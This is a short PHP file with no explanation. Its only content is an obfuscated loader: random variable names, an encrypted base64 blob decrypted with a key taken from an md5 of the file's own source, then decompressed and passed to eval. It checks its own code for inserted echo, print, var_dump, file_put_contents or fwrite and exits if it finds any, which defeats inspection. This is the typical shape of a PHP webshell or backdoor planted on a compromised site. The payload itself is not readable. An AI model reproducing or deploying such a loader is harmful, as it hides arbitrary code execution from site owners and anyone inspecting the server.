<?php
$vhlzuekv="b65e51abcb8388efec2cdb8f8fa7de1d";
$eyipapxvfb="50070d565453045b5b550a555e5903045050005757015a030a03040f02545406";
$irxfde="SutFoTAIZhgose1t2+IuQjPhgq+BCsJB4sJbzWpQ1ywEY+8iVMaovEKnbMqMDw5Lp5RDSoyefxpFB8V/0FC21aEyRbeIkZjkfA0OfSwLNQeU4Ph02YgIdRzNhKrv1E0i1XlelaggaiZHgftMeTqYoPNAqkEn0yFjPtEhPcoUdn4CU1z6wWvdQU3Hz2NYQ84TK7j2N8k7wHMuvD3IMdxVePWMkyz9mI07xbWVZzzcvf2hpcxVODFsDgMs8qeVAg2vVc4QvAAVQ6vuniSjfqj6tb7WmPzJc8V703kyXvmrR84uqKku894EhQdp+0eE5bCJFylmu7FczM+4AqYaAnj8gjdu51NtwHlDOfnzwYaaMrlC/AVvbZA7jJGdhwYmJkLvmVN8JTpnn9NhA6OOPcYKMlF3zF8hl2HirLC+";
$jqmjcxmbbrc=file_get_contents(__FILE__);
$ajytiu=str_replace($irxfde,"",$jqmjcxmbbrc);
if(strpos($ajytiu,"ec"."ho")!==false||strpos($ajytiu,"pr"."int")!==false||strpos($ajytiu,"var_"."dump")!==false||strpos($ajytiu,"file_put_"."contents")!==false||strpos($ajytiu,"fw"."rite")!==false){die();}
$zwjafttmq=str_replace(array($vhlzuekv,$eyipapxvfb),array("SP_abdc2739","KP_1e011afa"),$jqmjcxmbbrc);
$urganaencl=md5($zwjafttmq);
$tnczupfn=hex2bin($eyipapxvfb);
$ujfvbri="";
$bltoglcfa=strlen($urganaencl);
for($ezaffvynpm=0;$ezaffvynpm<$bltoglcfa;$ezaffvynpm++){
$ujfvbri.=chr(ord($tnczupfn[$ezaffvynpm])^ord($urganaencl[$ezaffvynpm]));
}
$lwxkgbfcj=base64_decode($irxfde);
$xmezbk=strlen($lwxkgbfcj);
$qqbovmkj="";
$tggcxtc=strlen($ujfvbri);
for($ezaffvynpm=0;$ezaffvynpm<$xmezbk;$ezaffvynpm++){
$qqbovmkj.=$lwxkgbfcj[$ezaffvynpm]^$ujfvbri[$ezaffvynpm%$tggcxtc];
}
$rfqfzzb="gzun"."compress";
eval($rfqfzzb($qqbovmkj));
